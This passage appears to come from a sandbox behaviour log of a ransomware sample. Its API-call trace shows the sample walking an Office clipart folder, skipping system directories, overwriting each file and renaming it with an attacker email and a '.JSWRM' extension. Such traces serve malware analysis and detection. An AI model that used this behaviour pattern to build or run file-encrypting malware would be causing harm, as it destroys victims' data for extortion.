out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.534] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0098.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.534] CloseHandle (hObject=0x314) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0098.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0098.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0098.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0098.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0098.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0098.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0098.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.535] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TAIL.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tail.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TAIL.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tail.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0098.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0098.536] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbde2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00011_.WMF", cAlternateFileName="")) returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2=".") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="..") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="...") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="windows") returned -1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="recovery") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="perflogs") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="documents and settings") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="system volume information") returned 1 [0098.536] lstrcmpiW (lpString1="TN00011_.WMF", lpString2="msocache") returned 1 [0098.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0098.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00011_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00011_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00011_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0098.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0098.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00011_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00011_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00011_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0098.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0098.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00011_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00011_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.537] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48610) returned 1 [0098.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbde0) returned 0x24d210 [0098.537] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbde0, lpOverlapped=0x0) returned 1 [0098.542] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.542] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbde0, lpOverlapped=0x0) returned 1 [0098.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.543] CloseHandle (hObject=0x314) returned 1 [0098.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0098.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0098.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0098.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0098.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0098.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0098.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.543] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00011_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00011_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00011_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00011_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0098.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0098.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.544] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d5e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00014_.WMF", cAlternateFileName="")) returned 1 [0098.544] lstrcmpiW (lpString1="TN00014_.WMF", lpString2=".") returned 1 [0098.544] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="..") returned 1 [0098.544] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="...") returned 1 [0098.544] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="windows") returned -1 [0098.544] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="recovery") returned 1 [0098.545] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="perflogs") returned 1 [0098.545] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="documents and settings") returned 1 [0098.545] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.545] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="system volume information") returned 1 [0098.545] lstrcmpiW (lpString1="TN00014_.WMF", lpString2="msocache") returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0098.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00014_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00014_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00014_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00014_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00014_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00014_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0098.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00014_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00014_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.545] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7518) returned 1 [0098.546] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d50) returned 0x205850 [0098.546] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d50, lpOverlapped=0x0) returned 1 [0098.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.548] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d50, lpOverlapped=0x0) returned 1 [0098.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.548] CloseHandle (hObject=0x314) returned 1 [0098.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0098.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0098.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0098.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0098.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0098.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.548] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00014_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00014_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00014_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00014_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0098.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0098.550] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x243c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00018_.WMF", cAlternateFileName="")) returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2=".") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="..") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="...") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="windows") returned -1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="recovery") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="perflogs") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="documents and settings") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="system volume information") returned 1 [0098.550] lstrcmpiW (lpString1="TN00018_.WMF", lpString2="msocache") returned 1 [0098.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0098.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00018_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00018_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00018_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0098.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0098.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00018_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00018_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00018_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0098.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0098.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00018_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00018_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.551] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9276) returned 1 [0098.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2430) returned 0x24d210 [0098.552] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2430, lpOverlapped=0x0) returned 1 [0098.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.554] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2430, lpOverlapped=0x0) returned 1 [0098.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.554] CloseHandle (hObject=0x314) returned 1 [0098.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0098.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0098.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 